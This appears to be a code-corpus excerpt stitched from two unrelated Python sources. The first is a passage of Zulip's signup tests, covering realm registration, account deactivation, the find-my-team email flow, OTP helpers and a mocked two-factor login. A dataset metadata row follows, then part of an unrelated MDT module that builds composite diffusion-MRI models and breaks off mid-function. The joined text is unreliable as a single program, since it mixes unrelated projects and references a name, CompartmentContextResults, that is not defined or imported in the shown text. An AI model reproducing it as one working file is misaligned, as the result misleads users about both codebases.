        subdomain and logs the creator in via the subdomain login flow."""
        count = UserProfile.objects.count()
        string_id = f"realm-{count}"
        result = self.client_post('/devtools/register_realm/')
        self.assertEqual(result.status_code, 302)
        # First redirect goes to the subdomain's login-continuation URL.
        self.assertTrue(result["Location"].startswith(
            f'http://{string_id}.testserver/accounts/login/subdomain'))
        result = self.client_get(result["Location"], subdomain=string_id)
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result["Location"], f'http://{string_id}.testserver')
        # The newest UserProfile (highest id) is the realm creator.
        user_profile = UserProfile.objects.all().order_by("id").last()
        self.assert_logged_in_user_id(user_profile.id)
class DeactivateUserTest(ZulipTestCase):
    """Tests for the DELETE /json/users/me self-deactivation endpoint."""
    def test_deactivate_user(self) -> None:
        """Self-deactivation disables the account and blocks future login."""
        user = self.example_user('hamlet')
        email = user.email
        self.login_user(user)
        self.assertTrue(user.is_active)
        result = self.client_delete('/json/users/me')
        self.assert_json_success(result)
        # Re-fetch: the in-memory object is stale after the request.
        user = self.example_user('hamlet')
        self.assertFalse(user.is_active)
        password = initial_password(email)
        self.assert_login_failure(email, password=password)
    def test_do_not_deactivate_final_owner(self) -> None:
        """The last realm owner cannot self-deactivate; once another owner
        exists, self-deactivation succeeds."""
        user = self.example_user('desdemona')
        user_2 = self.example_user('iago')
        self.login_user(user)
        self.assertTrue(user.is_active)
        result = self.client_delete('/json/users/me')
        self.assert_json_error(result, "Cannot deactivate the only organization owner.")
        user = self.example_user('desdemona')
        self.assertTrue(user.is_active)
        self.assertTrue(user.is_realm_owner)
        # Promote a second owner, after which self-deactivation is allowed.
        do_change_user_role(user_2, UserProfile.ROLE_REALM_OWNER)
        self.assertTrue(user_2.is_realm_owner)
        result = self.client_delete('/json/users/me')
        self.assert_json_success(result)
        # Restore ownership for test isolation.
        do_change_user_role(user, UserProfile.ROLE_REALM_OWNER)
    def test_do_not_deactivate_final_user(self) -> None:
        """The last active user in a realm cannot self-deactivate."""
        realm = get_realm('zulip')
        # Deactivate everyone except the realm owners, leaving desdemona
        # as the only active user.
        UserProfile.objects.filter(realm=realm).exclude(
            role=UserProfile.ROLE_REALM_OWNER).update(is_active=False)
        user = self.example_user("desdemona")
        self.login_user(user)
        result = self.client_delete('/json/users/me')
        self.assert_json_error(result, "Cannot deactivate the only user.")
class TestLoginPage(ZulipTestCase):
    """Tests for /login/ routing on root-domain hosts and the
    invite-required registration hint."""
    @patch('django.http.HttpRequest.get_host')
    def test_login_page_redirects_for_root_alias(self, mock_get_host: MagicMock) -> None:
        """With ROOT_DOMAIN_LANDING_PAGE, a root-alias host ('www.*') is
        redirected from /login/ to /accounts/go/, preserving ?next=."""
        mock_get_host.return_value = 'www.testserver'
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            result = self.client_get("/en/login/")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, '/accounts/go/')
            result = self.client_get("/en/login/?next=/upgrade/")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, '/accounts/go/?next=%2Fupgrade%2F')
    @patch('django.http.HttpRequest.get_host')
    def test_login_page_redirects_for_root_domain(self, mock_get_host: MagicMock) -> None:
        """Same redirect for the bare root domain, including a custom
        EXTERNAL_HOST with ROOT_SUBDOMAIN_ALIASES configured."""
        mock_get_host.return_value = 'testserver'
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            result = self.client_get("/en/login/")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, '/accounts/go/')
            result = self.client_get("/en/login/?next=/upgrade/")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, '/accounts/go/?next=%2Fupgrade%2F')
        mock_get_host.return_value = 'www.testserver.com'
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True,
                           EXTERNAL_HOST='www.testserver.com',
                           ROOT_SUBDOMAIN_ALIASES=['test']):
            result = self.client_get("/en/login/")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, '/accounts/go/')
            result = self.client_get("/en/login/?next=/upgrade/")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, '/accounts/go/?next=%2Fupgrade%2F')
    @patch('django.http.HttpRequest.get_host')
    def test_login_page_works_without_subdomains(self, mock_get_host: MagicMock) -> None:
        """Without ROOT_DOMAIN_LANDING_PAGE, /login/ renders normally (200)
        on both the www alias and the bare root host."""
        mock_get_host.return_value = 'www.testserver'
        with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
            result = self.client_get("/en/login/")
            self.assertEqual(result.status_code, 200)
        mock_get_host.return_value = 'testserver'
        with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
            result = self.client_get("/en/login/")
            self.assertEqual(result.status_code, 200)
    def test_login_page_registration_hint(self) -> None:
        """The invite-required hint appears on /login/ only when the realm
        has invite_required enabled."""
        response = self.client_get("/login/")
        self.assert_not_in_success_response(["Don't have an account yet? You need to be invited to join this organization."], response)
        realm = get_realm("zulip")
        realm.invite_required = True
        realm.save(update_fields=["invite_required"])
        response = self.client_get("/login/")
        self.assert_in_success_response(["Don't have an account yet? You need to be invited to join this organization."], response)
class TestFindMyTeam(ZulipTestCase):
    """Tests for the /accounts/find/ account-finder form and the emails
    it sends (or deliberately does not send)."""
    def test_template(self) -> None:
        """The finder page renders."""
        result = self.client_get('/accounts/find/')
        self.assertIn("Find your Zulip accounts", result.content.decode('utf8'))
    def test_result(self) -> None:
        """Submitting valid emails redirects back with them in the query
        string and sends one email per (user, realm) account."""
        result = self.client_post('/accounts/find/',
                                  dict(emails="iago@zulip.com,cordelia@zulip.com"))
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Ccordelia%40zulip.com")
        result = self.client_get(result.url)
        content = result.content.decode('utf8')
        self.assertIn("Emails sent! You will only receive emails", content)
        self.assertIn(self.example_email("iago"), content)
        self.assertIn(self.example_email("cordelia"), content)
        from django.core.mail import outbox
        # 3 = 1 + 2 -- Cordelia gets an email each for the "zulip" and "lear" realms.
        self.assertEqual(len(outbox), 3)
    def test_find_team_ignore_invalid_email(self) -> None:
        """An unknown (but well-formed) email is echoed back on the page
        yet triggers no email."""
        result = self.client_post('/accounts/find/',
                                  dict(emails="iago@zulip.com,invalid_email@zulip.com"))
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Cinvalid_email%40zulip.com")
        result = self.client_get(result.url)
        content = result.content.decode('utf8')
        self.assertIn("Emails sent! You will only receive emails", content)
        self.assertIn(self.example_email("iago"), content)
        self.assertIn("invalid_email@", content)
        from django.core.mail import outbox
        # Only iago's account email is sent.
        self.assertEqual(len(outbox), 1)
    def test_find_team_reject_invalid_email(self) -> None:
        """A malformed address fails form validation and sends nothing."""
        result = self.client_post('/accounts/find/',
                                  dict(emails="invalid_string"))
        self.assertEqual(result.status_code, 200)
        self.assertIn(b"Enter a valid email", result.content)
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)
        # Just for coverage on perhaps-unnecessary validation code.
        result = self.client_get('/accounts/find/?emails=invalid')
        self.assertEqual(result.status_code, 200)
    def test_find_team_zero_emails(self) -> None:
        """An empty submission is a required-field error; no email sent."""
        data = {'emails': ''}
        result = self.client_post('/accounts/find/', data)
        self.assertIn('This field is required', result.content.decode('utf8'))
        self.assertEqual(result.status_code, 200)
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)
    def test_find_team_one_email(self) -> None:
        """A single known email sends exactly one account email."""
        data = {'emails': self.example_email("hamlet")}
        result = self.client_post('/accounts/find/', data)
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 1)
    def test_find_team_deactivated_user(self) -> None:
        """Deactivated users get no finder email (but the response does
        not reveal that, to avoid leaking account state)."""
        do_deactivate_user(self.example_user("hamlet"))
        data = {'emails': self.example_email("hamlet")}
        result = self.client_post('/accounts/find/', data)
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)
    def test_find_team_deactivated_realm(self) -> None:
        """Accounts in a deactivated realm get no finder email."""
        do_deactivate_realm(get_realm("zulip"))
        data = {'emails': self.example_email("hamlet")}
        result = self.client_post('/accounts/find/', data)
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)
    def test_find_team_bot_email(self) -> None:
        """Bot accounts get no finder email."""
        data = {'emails': self.example_email("webhook_bot")}
        result = self.client_post('/accounts/find/', data)
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result.url, '/accounts/find/?emails=webhook-bot%40zulip.com')
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)
    def test_find_team_more_than_ten_emails(self) -> None:
        """More than 10 addresses is rejected by form validation."""
        data = {'emails': ','.join([f'hamlet-{i}@zulip.com' for i in range(11)])}
        result = self.client_post('/accounts/find/', data)
        self.assertEqual(result.status_code, 200)
        self.assertIn("Please enter at most 10", result.content.decode('utf8'))
        from django.core.mail import outbox
        self.assertEqual(len(outbox), 0)
class ConfirmationKeyTest(ZulipTestCase):
    """Test that the confirmation_key view echoes the key stored in the
    request's session."""
    def test_confirmation_key(self) -> None:
        mock_request = MagicMock()
        mock_request.session = {
            'confirmation_key': {'confirmation_key': 'xyzzy'},
        }
        response = confirmation_key(mock_request)
        self.assert_json_success(response)
        # The key itself must appear in the JSON payload.
        self.assert_in_response('xyzzy', response)
class MobileAuthOTPTest(ZulipTestCase):
    """Tests for the one-time-pad helpers used by the mobile auth flow."""

    def test_xor_hex_strings(self) -> None:
        self.assertEqual(xor_hex_strings('1237c81ab', '18989fd12'), '0aaf57cb9')
        # mismatched lengths are a programming error
        with self.assertRaises(AssertionError):
            xor_hex_strings('1', '31')

    def test_is_valid_otp(self) -> None:
        self.assertEqual(is_valid_otp('1234'), False)
        self.assertEqual(is_valid_otp('1234abcd' * 8), True)
        self.assertEqual(is_valid_otp('1234abcZ' * 8), False)

    def test_ascii_to_hex(self) -> None:
        self.assertEqual(ascii_to_hex('ZcdR1234'), '5a63645231323334')
        self.assertEqual(hex_to_ascii('5a63645231323334'), 'ZcdR1234')

    def test_otp_encrypt_api_key(self) -> None:
        api_key = '12ac' * 8
        otp = '7be38894' * 8
        encrypted = otp_encrypt_api_key(api_key, otp)
        self.assertEqual(encrypted, '4ad1e9f7' * 8)
        # decrypting with the same pad must round-trip
        decrypted = otp_decrypt_api_key(encrypted, otp)
        self.assertEqual(decrypted, api_key)
class FollowupEmailTest(ZulipTestCase):
    def test_followup_day2_email(self) -> None:
        """The day-2 followup is scheduled one hour before the join time, on a weekday."""
        user_profile = self.example_user('hamlet')
        # Test date_joined == Sunday
        user_profile.date_joined = datetime.datetime(2018, 1, 7, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
        self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1))
        # Test date_joined == Tuesday
        user_profile.date_joined = datetime.datetime(2018, 1, 2, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
        self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1))
        # Test date_joined == Thursday
        user_profile.date_joined = datetime.datetime(2018, 1, 4, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
        self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1))
        # Test date_joined == Friday (the larger delay skips the weekend)
        user_profile.date_joined = datetime.datetime(2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
        self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=3, hours=-1))
        # Time offset of America/Phoenix is -07:00
        user_profile.timezone = 'America/Phoenix'
        # Test date_joined == Friday in UTC, but Thursday in the user's timezone
        user_profile.date_joined = datetime.datetime(2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
        self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1))
class NoReplyEmailTest(ZulipTestCase):
    """Behavior of the tokenized noreply from-address."""

    def test_noreply_email_address(self) -> None:
        tokenized_address = FromAddress.tokenized_no_reply_address()
        self.assertTrue(re.search(self.TOKENIZED_NOREPLY_REGEX, tokenized_address))
        # with tokens disabled, the plain noreply address is used
        with self.settings(ADD_TOKENS_TO_NOREPLY_ADDRESS=False):
            self.assertEqual(FromAddress.tokenized_no_reply_address(), "noreply@testserver")
class TwoFactorAuthTest(ZulipTestCase):
    @patch('two_factor.models.totp')
    def test_two_factor_login(self, mock_totp: MagicMock) -> None:
        """Full two-step (password + TOTP token) login flow, with a mocked token source."""
        token = 123456
        email = self.example_email('hamlet')
        password = self.ldap_password('hamlet')
        user_profile = self.example_user('hamlet')
        user_profile.set_password(password)
        user_profile.save()
        self.create_default_device(user_profile)

        # make every generated TOTP value equal our fixed token
        def totp(*args: Any, **kwargs: Any) -> int:
            return token
        mock_totp.side_effect = totp

        with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',),
                           TWO_FACTOR_CALL_GATEWAY='two_factor.gateways.fake.Fake',
                           TWO_FACTOR_SMS_GATEWAY='two_factor.gateways.fake.Fake',
                           TWO_FACTOR_AUTHENTICATION_ENABLED=True):
            # step 1: username/password
            first_step_data = {"username": email,
                               "password": password,
                               "two_factor_login_view-current_step": "auth"}
            result = self.client_post("/accounts/login/", first_step_data)
            self.assertEqual(result.status_code, 200)

            # step 2: the TOTP token
            second_step_data = {"token-otp_token": str(token),
                                "two_factor_login_view-current_step": "token"}
            result = self.client_post("/accounts/login/", second_step_data)
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result["Location"], "http://zulip.testserver")

            # Going to login page should redirect to '/' if user is already
            # logged in.
            result = self.client_get('/accounts/login/')
            self.assertEqual(result["Location"], "http://zulip.testserver")
class NameRestrictionsTest(ZulipTestCase):
    """Disposable-domain detection for whitelisted providers."""

    def test_whitelisted_disposable_domains(self) -> None:
        # a mixed-case whitelisted domain must not be flagged as disposable
        self.assertFalse(is_disposable_domain('OPayQ.com'))
class RealmRedirectTest(ZulipTestCase):
    """Tests for the /accounts/go/ realm-redirect form."""

    def test_realm_redirect_without_next_param(self) -> None:
        response = self.client_get("/accounts/go/")
        self.assert_in_success_response(["Enter your organization's Zulip URL"], response)

        response = self.client_post("/accounts/go/", {"subdomain": "zephyr"})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response["Location"], "http://zephyr.testserver")

        response = self.client_post("/accounts/go/", {"subdomain": "invalid"})
        self.assert_in_success_response(["We couldn't find that Zulip organization."], response)

    def test_realm_redirect_with_next_param(self) -> None:
        response = self.client_get("/accounts/go/?next=billing")
        self.assert_in_success_response(
            ["Enter your organization's Zulip URL", 'action="/accounts/go/?next=billing"'], response)

        response = self.client_post("/accounts/go/?next=billing", {"subdomain": "lear"})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response["Location"], "http://lear.testserver/billing")
| timabbott/zulip | zerver/tests/test_signup.py | Python | apache-2.0 | 198,704 | [
"VisIt"
] | dad9f124078b596f77d2c2ab2f59581b3d488bec7e51c07ae8566d9f4976a8d7 |
import collections
import collections.abc
import re
from copy import deepcopy

import numpy as np
import tatsu

from mdt.component_templates.base import ComponentBuilder, ComponentTemplate
from mdt.lib.components import get_component
from mdt.model_building.parameters import FreeParameter, ProtocolParameter
from mdt.model_building.trees import CompartmentModelTree
from mdt.models.composite import DMRICompositeModel
from mot.lib.cl_function import CLFunction, SimpleCLFunction
from mot.optimize.base import SimpleConstraintFunction
__author__ = 'Robbert Harms'
__date__ = "2017-02-14"
__maintainer__ = "Robbert Harms"
__email__ = "robbert@xkls.nl"
# Grammar for composite model expressions: sums and products of (optionally
# nicknamed) compartment models, with parentheses for grouping. Compiled once
# at import time. The literal is raw because the regex tokens contain '\w',
# which is an invalid escape sequence in a plain string literal.
_composite_model_expression_parser = tatsu.compile(r'''
    result = expr;
    expr = term ('+'|'-') expr | term;
    term = factor ('*'|'/') term | factor;
    factor = '(' expr ')' | model;
    model = model_name ['(' nickname ')'];
    model_name = /[a-zA-Z_]\w*/;
    nickname = /[a-zA-Z_]\w*/;
''')
class DMRICompositeModelBuilder(ComponentBuilder):
    """Builds concrete :class:`DMRICompositeModel` subclasses from composite model templates."""

    def _create_class(self, template):
        """Creates classes with as base class DMRICompositeModel

        Args:
            template (CompositeModelTemplate): the composite model config template
                to use for creating the class with the right init settings.
        """
        class AutoCreatedDMRICompositeModel(DMRICompositeModel):

            def __init__(self, volume_selection=True):
                super().__init__(
                    deepcopy(template.name),
                    CompartmentModelTree(parse_composite_model_expression(template.model_expression)),
                    deepcopy(_resolve_likelihood_function(template.likelihood_function)),
                    signal_noise_model=_resolve_signal_noise_model(template.signal_noise_model),
                    enforce_weights_sum_to_one=template.enforce_weights_sum_to_one,
                    volume_selection=volume_selection
                )

                # apply the template-declared initial values, fixes and bounds
                for full_param_name, value in template.inits.items():
                    self.init(full_param_name, deepcopy(value))
                for full_param_name, value in template.fixes.items():
                    self.fix(full_param_name, deepcopy(value))
                for full_param_name, value in template.lower_bounds.items():
                    self.set_lower_bound(full_param_name, deepcopy(value))
                for full_param_name, value in template.upper_bounds.items():
                    self.set_upper_bound(full_param_name, deepcopy(value))

                self.nmr_parameters_for_bic_calculation = self.get_nmr_parameters()

                # extra output maps: compartment-defined first, then template-defined
                self._extra_optimization_maps_funcs.extend(_get_model_extra_optimization_maps_funcs(
                    self._model_functions_info.get_compartment_models()))
                self._extra_optimization_maps_funcs.extend(deepcopy(template.extra_optimization_maps))
                self._extra_sampling_maps_funcs.extend(_get_model_extra_sampling_maps_funcs(
                    self._model_functions_info.get_compartment_models()))
                self._extra_sampling_maps_funcs.extend(deepcopy(template.extra_sampling_maps))

                self._model_priors.extend(_resolve_model_prior(
                    template.prior, self._model_functions_info.get_model_parameter_list()))

                # model-wide constraints from the template, plus constraints
                # declared by the individual compartments
                constraint_func = _resolve_constraints(
                    template.constraints, self._model_functions_info.get_model_parameter_list())
                if constraint_func:
                    self._constraints.append(constraint_func)
                self._constraints.extend(_get_compartment_constraints(
                    self._model_functions_info.get_compartment_models()))

            def _get_suitable_volume_indices(self, input_data):
                """Restrict the analysis to the volumes matching the template's ``volume_selection``."""
                volume_selection = template.volume_selection

                # no selection configured: fall back to the base class behavior
                if not volume_selection:
                    return super()._get_suitable_volume_indices(input_data)

                protocol_indices = []
                for protocol_name, ranges in volume_selection.items():
                    values = input_data.protocol[protocol_name]
                    for start, end in ranges:
                        # indices of volumes whose protocol value lies in [start, end]
                        protocol_indices.extend(np.where((start <= values) * (values <= end))[0])

                return np.unique(protocol_indices)

        # attach the template-declared bound methods to the generated class
        for name, method in template.bound_methods.items():
            setattr(AutoCreatedDMRICompositeModel, name, method)

        return AutoCreatedDMRICompositeModel
class CompositeModelTemplate(ComponentTemplate):
    """The composite model config to inherit from.

    These configs are loaded on the fly by the DMRICompositeModelBuilder

    Attributes:
        name (str): the name of the model, defaults to the class name
        description (str): model description
        extra_optimization_maps (list): a list of functions to return extra information maps based on a point estimate.
            This is called after after the model calculated uncertainties based on the Fisher Information Matrix.
            Therefore, these routines can propagate uncertainties in the estimates.

            These functions should accept as single argument an object of type
            :class:`mdt.models.composite.ExtraOptimizationMapsInfo`.

            Examples::

                extra_optimization_maps = [lambda d: {'FS': 1 - d['w_ball.w']},
                                           lambda d: {'Kurtosis.MK': <...>},
                                           lambda d: {'Power2': d['foo']**2, 'Power3': d['foo']**3},
                                           ...]

        extra_sampling_maps (list): a list of functions to return additional maps as results from sample.
            This is called after sample with as argument a dictionary containing the sample results and
            the values of the fixed parameters.

            Examples::

                extra_sampling_maps = [lambda d: {'FS': np.mean(d['w_stick0.w'], axis=1),
                                                  'FS.std': np.std(d['w_stick0.w'], axis=1)}
                                       ...]

        model_expression (str): the model expression. For the syntax see:
            mdt.models.parsers.CompositeModelExpression.ebnf
        likelihood_function (:class:`mdt.model_building.likelihood_functions.LikelihoodFunction` or str): the
            likelihood function to use during optimization, can also can be a string with one of
            'Gaussian', 'OffsetGaussian' or 'Rician'
        signal_noise_model (SignalNoiseModel): optional signal noise decorator
        inits (dict): indicating the initialization values for the parameters. Example:

            .. code-block:: python

                inits = {'Stick.theta': np.pi}

        fixes (dict): indicating the constant value for the given parameters. Example:

            .. code-block:: python

                fixes = {'Ball.d': 3.0e-9,
                         'NODDI_EC.kappa': SimpleAssignment('NODDI_IC.kappa'),
                         'NODDI_EC.theta': 'NODDI_IC.theta'}

            Next to values, this also accepts strings as dependencies (or dependecy objects directly).

        upper_bounds (dict): indicating the upper bounds for the given parameters. Example:

            .. code-block:: python

                upper_bounds = {'Stick.theta': pi}

        lower_bounds (dict): indicating the lower bounds for the given parameters. Example:

            .. code-block:: python

                lower_bounds = {'Stick.theta': 0}

        enforce_weights_sum_to_one (boolean): set to False to disable the automatic Weight-sum-to-one dependency.
            By default it is True and we add them.
        volume_selection (dict): the volume selection by this model. This can be used to limit the volumes used
            in the analysis to only the volumes included in the specification. You can specify specific protocol
            names here for limiting the selected volumes. For example, for the Tensor model we can write::

                volume_selection = {'b': [(0, 1.5e9 + 0.1e9)]}

            To limit the volumes to the b-values between 0 and 1.6e9.

            If the method ``_get_suitable_volume_indices`` is overwritten, this does nothing.
        prior (str or CLFunction or None): a model wide prior. This is used in conjunction
            with the compartment priors and the parameter priors.
        constraints (str or None): additional inequality constraints for this model. Each constraint needs to be
            implemented as ``g(x)`` where we assume that ``g(x) <= 0``. For example, to implement a simple inequality
            constraint like ``Tensor.d >= Tensor.dperp0``, we first write it as ``Tensor.dperp0 - Tensor.d <= 0``.
            We can then implement it as::

                constraints = 'constraints[0] = Tensor.dperp0 - Tensor.d;'

            To add more constraint, add another entry to the ``constraints`` array. MDT parses the given text and
            automatically recognizes the model parameter names and the number of constraints.
    """
    # registration info used by the component loading machinery
    _component_type = 'composite_models'
    _builder = DMRICompositeModelBuilder()

    # template defaults; subclasses override what they need
    name = ''
    description = ''
    extra_optimization_maps = []
    extra_sampling_maps = []
    model_expression = ''
    likelihood_function = 'OffsetGaussian'
    signal_noise_model = None
    inits = {}
    fixes = {}
    upper_bounds = {}
    lower_bounds = {}
    enforce_weights_sum_to_one = True
    volume_selection = None
    prior = None
    constraints = None

    @classmethod
    def meta_info(cls):
        """Return the base meta information extended with this template's name and description."""
        meta_info = deepcopy(ComponentTemplate.meta_info())
        meta_info.update({'name': cls.name,
                          'description': cls.description})
        return meta_info
def _resolve_likelihood_function(likelihood_function):
"""Resolve the likelihood function from a string if necessary.
The composite models accept likelihood functions as a string and as a object. This function
resolves the strings if a string is given, else it returns the object passed.
Args:
likelihood_function (str or object): the likelihood function to resolve to an object
Returns:
mdt.model_building.likelihood_models.LikelihoodFunction: the likelihood function to use
"""
if isinstance(likelihood_function, str):
return get_component('likelihood_functions', likelihood_function)()
else:
return likelihood_function
def _resolve_signal_noise_model(signal_noise_function):
"""Resolve the signal noise function from a string if necessary.
The composite models accept signal noise functions as a string and as a object. This function
resolves the strings if a string is given, else it returns the object passed.
Args:
signal_noise_function (str or object): the signal noise function to resolve to an object
Returns:
mdt.model_building.signal_noise_models.SignalNoiseModel: the signal noise function to use
"""
if isinstance(signal_noise_function, str):
return get_component('signal_noise_functions', signal_noise_function)()
else:
return signal_noise_function
def _resolve_model_prior(prior, model_parameters):
    """Resolve the model priors.

    Args:
        prior (None or str or mot.lib.cl_function.CLFunction): the prior defined in the composite model template.
        model_parameters (str): the (model, parameter) tuple for all the parameters in the model

    Returns:
        list of mdt.model_building.utils.ModelPrior: list of model priors
    """
    if prior is None:
        return []

    if isinstance(prior, CLFunction):
        return [prior]

    # longest names first so a short name cannot clobber a longer name containing it
    dotted_names = ['{}.{}'.format(m.name, p.name) for m, p in model_parameters]
    dotted_names.sort(key=len, reverse=True)

    parameters = []
    remaining_prior = prior
    for dotted_name in dotted_names:
        bar_name = dotted_name.replace('.', '_')

        if dotted_name in remaining_prior:
            # rewrite the CL source to use the underscored name
            prior = prior.replace(dotted_name, bar_name)
            remaining_prior = remaining_prior.replace(dotted_name, '')
            # NOTE(review): the parameter is declared with the dotted name while the
            # rewritten body uses the underscored name — presumably resolved downstream;
            # verify against SimpleCLFunction's parameter handling.
            parameters.append('mot_float_type ' + dotted_name)
        elif bar_name in remaining_prior:
            remaining_prior = remaining_prior.replace(bar_name, '')
            parameters.append('mot_float_type ' + dotted_name)

    return [SimpleCLFunction('mot_float_type', 'model_prior', parameters, prior)]
def _get_compartment_constraints(compartments):
    """Get a list of all the constraint functions defined in the compartments.

    This function will add a wrapper around the constraint functions to make the inputs relative to the
    compartment model. That it, the constraint functions of the compartments expect the parameter names without the
    model name, whereas the expected input of the composite constraint functions is with the full model.map name.

    Args:
        compartments (list): the list of compartment models from which to get the constraints

    Returns:
        List[mot.optimize.base.ConstraintFunction]: list of constraint functions from the compartments.
    """
    constraints = []

    def get_wrapped_function(compartment_name, original_constraint_func):
        # rename free parameters to '<compartment>_<param>' so they resolve against the
        # composite model; protocol parameters are shared, so they are kept as-is
        parameters = []
        for param in original_constraint_func.get_parameters():
            if isinstance(param, FreeParameter):
                parameters.append(param.get_renamed('{}_{}'.format(compartment_name, param.name)))
            elif isinstance(param, ProtocolParameter):
                parameters.append(param)

        # the wrapper simply forwards the renamed inputs to the original constraint function
        body = original_constraint_func.get_cl_function_name() + \
               '(' + ', '.join(p.name for p in parameters) + ', constraints);'

        return SimpleConstraintFunction(
            'void', 'wrapped_' + original_constraint_func.get_cl_function_name(),
            parameters + ['local mot_float_type* constraints'],
            body,
            dependencies=[original_constraint_func],
            nmr_constraints=original_constraint_func.get_nmr_constraints())

    for compartment in compartments:
        if compartment.get_constraints_func():
            constraints.append(get_wrapped_function(compartment.name, compartment.get_constraints_func()))

    return constraints
def _resolve_constraints(constraint, model_parameters):
    """Resolve the constraints.

    This parses the given constraints to recognize the parameters and the number of constraints.

    Args:
        constraint (str): the string with the constraints
        model_parameters (tuple(str)): the (model, parameter) tuples for all parameters in the model

    Returns:
        mot.optimize.base.ConstraintFunction: the additional constraint function for this composite model
    """
    if constraint is None:
        return None

    # number of constraints is the highest index written to 'constraints[...]' plus one
    constraint_refs = re.findall(r'constraints\[(\d+)\]', constraint)
    if not constraint_refs:
        return None
    nmr_constraints = max(map(int, constraint_refs)) + 1

    # free parameters are renamed to '<model>_<param>'; each protocol parameter is added only once
    parameters = []
    protocol_parameters_seen = []
    for m, p in model_parameters:
        if isinstance(p, FreeParameter):
            parameters.append(p.get_renamed('{}_{}'.format(m.name, p.name)))
        elif isinstance(p, ProtocolParameter):
            if p.name not in protocol_parameters_seen:
                parameters.append(p)
                protocol_parameters_seen.append(p.name)

    # rewrite dotted references (Model.param) in the CL source to underscored names;
    # longest names first so a short name cannot clobber a longer name containing it
    dotted_names = ['{}.{}'.format(m.name, p.name) for m, p in model_parameters]
    dotted_names.sort(key=len, reverse=True)

    remaining_constraint = constraint
    for dotted_name in dotted_names:
        bar_name = dotted_name.replace('.', '_')

        if dotted_name in remaining_constraint:
            constraint = constraint.replace(dotted_name, bar_name)
            remaining_constraint = remaining_constraint.replace(dotted_name, '')
        elif bar_name in remaining_constraint:
            remaining_constraint = remaining_constraint.replace(bar_name, '')

    return SimpleConstraintFunction('void', 'model_constraints',
                                    parameters + ['local mot_float_type* constraints'],
                                    constraint, nmr_constraints=nmr_constraints)
def _get_model_extra_optimization_maps_funcs(compartments):
    """Get a list of all the additional result functions defined in the compartments.

    This function will add a wrapper around the modification routines to make the input and output maps relative to the
    model. That it, the functions in the compartments expect the parameter names without the model name and they output
    maps without the model name, whereas the expected input and output of the functions of the model is with the
    full model.map name.

    Args:
        compartments (list): the list of compartment models from which to get the extra optimization maps

    Returns:
        list: the list of modification routines taken from the compartment models.
    """
    funcs = []

    def get_wrapped_func(compartment_name, original_func):
        def get_compartment_specific_results(results):
            # strip the '<compartment>.' prefix from the maps belonging to this compartment
            maps = {k[len(compartment_name) + 1:]: v for k, v in results.items() if k.startswith(compartment_name)}

            if 'covariances' in results and results['covariances'] is not None:
                # only keep covariances between two parameters of this same compartment
                p = re.compile(compartment_name + r'\.\w+_to_' + compartment_name + r'\.\w+')
                maps['covariances'] = {k.replace(compartment_name + '.', ''): v
                                       for k, v in results['covariances'].items() if p.match(k)}

            return results.copy_with_different_results(maps)

        def prepend_compartment_name(results):
            # re-add the compartment prefix to the maps produced by the compartment function
            return {'{}.{}'.format(compartment_name, key): value for key, value in results.items()}

        def wrapped_modifier(results):
            return prepend_compartment_name(original_func(get_compartment_specific_results(results)))

        return wrapped_modifier

    for compartment in compartments:
        for func in compartment.get_extra_optimization_maps_funcs():
            funcs.append(get_wrapped_func(compartment.name, func))

    return funcs
def _get_model_extra_sampling_maps_funcs(compartments):
    """Get a list of all the additional post-sample functions defined in the compartments.

    This function will add a wrapper around the modification routines to make the input and output maps relative to the
    model. That it, the functions in the compartments expect the parameter names without the model name and they output
    maps without the model name, whereas the expected input and output of the functions of the model is with the
    full model.map name.

    Args:
        compartments (list): the list of compartment models from which to get the extra sampling maps

    Returns:
        list: the list of extra sample routines taken from the compartment models.
    """
    funcs = []

    def get_wrapped_func(compartment_name, original_func):
        def prepend_compartment_name(results):
            # re-add the compartment prefix to the maps produced by the compartment function
            return {'{}.{}'.format(compartment_name, key): value for key, value in results.items()}

        def wrapped_modifier(results):
            # present the sample results relative to this compartment, then prefix the outputs
            return prepend_compartment_name(original_func(CompartmentContextResults(compartment_name, results)))

        return wrapped_modifier

